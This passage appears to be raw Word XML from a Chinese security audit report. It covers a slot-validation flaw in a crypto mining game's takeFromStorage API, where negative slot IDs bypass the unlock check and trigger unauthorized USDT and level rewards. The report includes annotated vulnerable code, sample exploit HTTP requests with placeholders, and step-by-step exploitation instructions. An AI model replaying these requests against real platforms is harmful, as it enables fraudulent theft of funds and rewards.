          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward(userId, userNewLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被触发，直接发放 USDT 及等级奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者只需对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0</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、…，即可无限扩展"幽灵坑位"，将存放处所有高等级矿机依次激活，重复触发等级奖励，同时以超出合法坑位限制的矿机数量获得远超上限的算力收益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="510"/>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511"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP 入口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/miner/takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@RequestBody TakeFromStorageForm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完全控制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（Integer 类型，可传负数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerService.takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅做 null 检查，随后调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked(userId, targetSlotId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行坑位校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 恒为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（负数满足该条件），直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，校验形同虚设</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>矿机被写入任意负数坑位，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将其纳入算力和等级计算，若等级提升则发放 USDT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="515"/>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516"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：攻击者可将存放处所有等级 &gt; 当前用户等级的矿机逐一激活至幽灵坑位（-1, -2, -3, ...），每放置一台高等级矿机即可领取对应等级段的 USDT 奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：等级奖励（金币、电力、矿机、加速卡等）被非授权领取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无限算力扩容：突破 6 个合法坑位上限，存放处所有矿机均可保持"活跃"状态，算力倍增，产出加速</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TakeFromStorageForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long minerId;         ← 矿机ID（需属于当前用户且在存放处）</w:t>
              <w:br/>
              <w:t>//   Integer targetSlotId; ← 目标坑位ID（攻击者可传0或任意负数）</w:t>
              <w:br/>
              <w:br/>
              <w:t>@PostMapping("/takeFromStorage")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; takeFromStorage(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @CurrentUserId Long userId,                   // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody TakeFromStorageForm form) {      // ← targetSlotId 攻击者完全可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.takeFromStorage(userId, form.getMinerId(), form.getTargetSlotId())); // ← 污点传入 service 层</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service：MinerService.java#takeFromStorage</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner takeFromStorage(Long userId, Long minerId, Integer targetSlotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (minerId == null || targetSlotId == null) {   // ← 仅校验 null，未校验 targetSlotId &gt; 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("矿机ID与目标坑位不能为空");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, targetSlotId)) {     // ← 以可控的 targetSlotId 调用校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0).isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位已被占用"); // ← 幽灵坑位首次必然为空，通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(targetSlotId);                   // ← 以非法负数坑位ID落库</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);              // ← 触发等级/USDT重算</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：MinerService.java#isSlotUnlocked</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>public boolean isSlotUnlocked(Lo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ng userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (slotId &lt;= 6) return true;   // ← 漏洞点：0、-1、-100 均满足 &lt;= 6，直接返回 true，完全绕过解锁校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(u -&gt; u.getIsUnlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 下游资金发放：MinerService.java#recalcUserLevelAndHashRate（同事务内执行）</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 幽灵坑位矿机（inStorage=0）被纳入计算</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel); // ← 非授权 USDT 奖励发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel); // ← 非授权等级奖励发放</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步骤一：将高等级矿机放入存放处（假设矿机已在存放处，跳过此步）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>步骤二：以负数坑位ID取出矿机，触发非授权等级奖励</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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按平台签名算法计算的签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;唯一随机数&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerId": &lt;攻击者存放处中高等级矿机的ID&gt;, "targetSlotId": -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>步骤三：继续用 -2、-3、… 激活存放处剩余矿机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/api/miner/takeFromStorage HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>...</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerId": &lt;第二台高等级矿机ID&gt;, "targetSlotId": -2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者注册/登录游戏账号，获取有效 Bearer Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确保账号存放处（storage）中存有若干矿机（尤其是等级高于用户当前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的矿机）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="521"/>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POST /api/miner/takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等任意负数/零）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="522"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked(userId, -1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-1 &lt;= 6 → true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，坑位校验被绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="523"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">矿机以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 保存入库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="524"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
